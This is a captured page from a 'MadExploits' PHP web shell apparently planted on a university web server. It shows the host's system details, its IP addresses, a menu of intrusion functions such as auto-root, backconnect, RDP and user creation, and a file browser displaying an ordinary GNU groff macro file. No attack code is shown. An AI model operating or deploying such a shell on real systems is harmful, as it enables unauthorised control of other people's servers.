Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.224.57.152
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
groff /
1.22.4 /
tmac /
[ HOME SHELL ]
Name
Size
Permission
Action
mdoc
[ DIR ]
drwxr-xr-x
an-ext.tmac
3.7
KB
-rw-r--r--
an-old.tmac
14.32
KB
-rw-r--r--
an.tmac
313
B
-rw-r--r--
andoc.tmac
2.59
KB
-rw-r--r--
composite.tmac
805
B
-rw-r--r--
cp1047.tmac
2.4
KB
-rw-r--r--
cs.tmac
4.72
KB
-rw-r--r--
de.tmac
5.01
KB
-rw-r--r--
den.tmac
1.2
KB
-rw-r--r--
devtag.tmac
3.74
KB
-rw-r--r--
doc-old.tmac
35.71
KB
-rw-r--r--
doc.tmac
84.61
KB
-rw-r--r--
eqnrc
1.39
KB
-rw-r--r--
europs.tmac
1.65
KB
-rw-r--r--
fallbacks.tmac
1.38
KB
-rw-r--r--
fr.tmac
5.43
KB
-rw-r--r--
hyphen.cs
20.93
KB
-rw-r--r--
hyphen.den
156.33
KB
-rw-r--r--
hyphen.det
157.14
KB
-rw-r--r--
hyphen.fr
27.55
KB
-rw-r--r--
hyphen.sv
34.02
KB
-rw-r--r--
hyphen.us
27.46
KB
-rw-r--r--
hyphenex.cs
505
B
-rw-r--r--
hyphenex.us
21.25
KB
-rw-r--r--
ja.tmac
1.89
KB
-rw-r--r--
latin1.tmac
2.22
KB
-rw-r--r--
latin2.tmac
2.31
KB
-rw-r--r--
latin5.tmac
2.23
KB
-rw-r--r--
latin9.tmac
2.22
KB
-rw-r--r--
man.tmac
58
B
-rw-r--r--
mandoc.tmac
61
B
-rw-r--r--
mdoc.tmac
57
B
-rw-r--r--
papersize.tmac
4.23
KB
-rw-r--r--
pdfpic.tmac
3.67
KB
-rw-r--r--
pic.tmac
139
B
-rw-r--r--
ps.tmac
20.09
KB
-rw-r--r--
psatk.tmac
1.08
KB
-rw-r--r--
psold.tmac
1.79
KB
-rw-r--r--
pspic.tmac
4.88
KB
-rw-r--r--
safer.tmac
218
B
-rw-r--r--
sv.tmac
4.3
KB
-rw-r--r--
trans.tmac
4.69
KB
-rw-r--r--
troffrc
1.6
KB
-rw-r--r--
troffrc-end
1.14
KB
-rw-r--r--
tty-char.tmac
5.69
KB
-rw-r--r--
tty.tmac
1.84
KB
-rw-r--r--
unicode.tmac
93
B
-rw-r--r--
www.tmac
39.96
KB
-rw-r--r--
zh.tmac
1.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : an-ext.tmac
.\" an-ext.tmac .\" .\" Copyright (C) 2007-2018 Free Software Foundation, Inc. .\" .\" Written by Eric S. Raymond <esr@thyrsus.com> .\" Werner Lemberg <wl@gnu.org> .\" .\" You may freely use, modify and/or distribute this file. .\" .\" The code below provides extension macros for the 'man' macro .\" package. Care has been taken to make the code portable; groff .\" extensions are properly hidden so that all troff implementations can .\" use it without changes. .\" .\" With groff, this file is sourced by the 'man' macro package itself. .\" Man page authors who are concerned about portability might add the .\" used macros directly to the prologue of the man page(s). . . .\" Convention: Auxiliary macros and registers start with 'm' followed .\" by an uppercase letter or digit. . . .\" Protect against being sourced twice. .nr mX +1 .if \n(mX>1 \ . nx . .\" Check whether we are using grohtml. .nr mH 0 .if \n(.g \ . if '\*(.T'html' \ . nr mH 1 . . .\" Map mono-width fonts to standard fonts for groff's TTY device. .if n \{\ . do ftr CR R . do ftr CI I . do ftr CB B .\} . .\" groff has glyph entities for angle brackets. .ie \n(.g \{\ . ds la \(la\" . ds ra \(ra\" .\} .el \{\ . ds la <\" . ds ra >\" . \" groff's man macros control hyphenation with this register. . nr HY 1 .\} . .nr mS 0 . . .\" Declare start of command synopsis. Sets up hanging indentation. .de SY . ie !\\n(mS \{\ . nh . nr mS 1 . nr mA \\n(.j . ad l . nr mI \\n(.i . \} . el \{\ . br . ns . \} . . nr mT \w'\fB\\$1\fP\ ' . HP \\n(mTu . B "\\$1" .. . . .\" End of command synopsis. Restores adjustment. .de YS . in \\n(mIu . ad \\n(mA . hy \\n(HY . nr mS 0 .. . . .\" Declare optional option. .de OP . ie \\n(.$-1 \ . RI "[\fB\\$1\fP" "\ \\$2" "]" . el \ . RB "[" "\\$1" "]" .. . . .\" Start URL. .de UR . ds m1 \\$1\" . nh . if \\n(mH \{\ . \" Start diversion in a new environment. . do ev URL-div . do di URL-div . \} .. . . .\" End URL. .de UE . ie \\n(mH \{\ . br . di . ev . . \" Has there been one or more input lines for the link text? . ie \\n(dn \{\ . do HTML-NS "<a href=""\\*(m1"">" . \" Yes, strip off final newline of diversion and emit it. . do chop URL-div . do URL-div \c . do HTML-NS </a> . \} . el \ . do HTML-NS "<a href=""\\*(m1"">\\*(m1</a>" \&\\$*\" . \} . el \ \\*(la\\*(m1\\*(ra\\$*\" . . hy \\n(HY .. . . .\" Start email address. .de MT . ds m1 \\$1\" . nh . if \\n(mH \{\ . \" Start diversion in a new environment. . do ev URL-div . do di URL-div . \} .. . . .\" End email address. .de ME . ie \\n(mH \{\ . br . di . ev . . \" Has there been one or more input lines for the link text? . ie \\n(dn \{\ . do HTML-NS "<a href=""mailto:\\*(m1"">" . \" Yes, strip off final newline of diversion and emit it. . do chop URL-div . do URL-div \c . do HTML-NS </a> . \} . el \ . do HTML-NS "<a href=""mailto:\\*(m1"">\\*(m1</a>" \&\\$*\" . \} . el \ \\*(la\\*(m1\\*(ra\\$*\" . . hy \\n(HY .. . . .\" Continuation line for .TP header. .de TQ . br . ns . TP \\$1\" no doublequotes around argument! .. . . .\" Start example. .de EX . do ds mF \\n[.fam] . nr mE \\n(.f . nf . nh . do fam C . ft CW .. . . .\" End example. .de EE . do fam \\*(mF . ft \\n(mE . fi . hy \\n(HY .. . . .\" Start display. .de DS . \" XXX to be written .. . . .\" End display. .de DE . \" XXX to be written .. . .\" ==================================================================== .\" Editor settings .\" ==================================================================== . .\" Local Variables: .\" mode: nroff .\" fill-column: 72 .\" End: .\" vim: set filetype=groff textwidth=72:
Close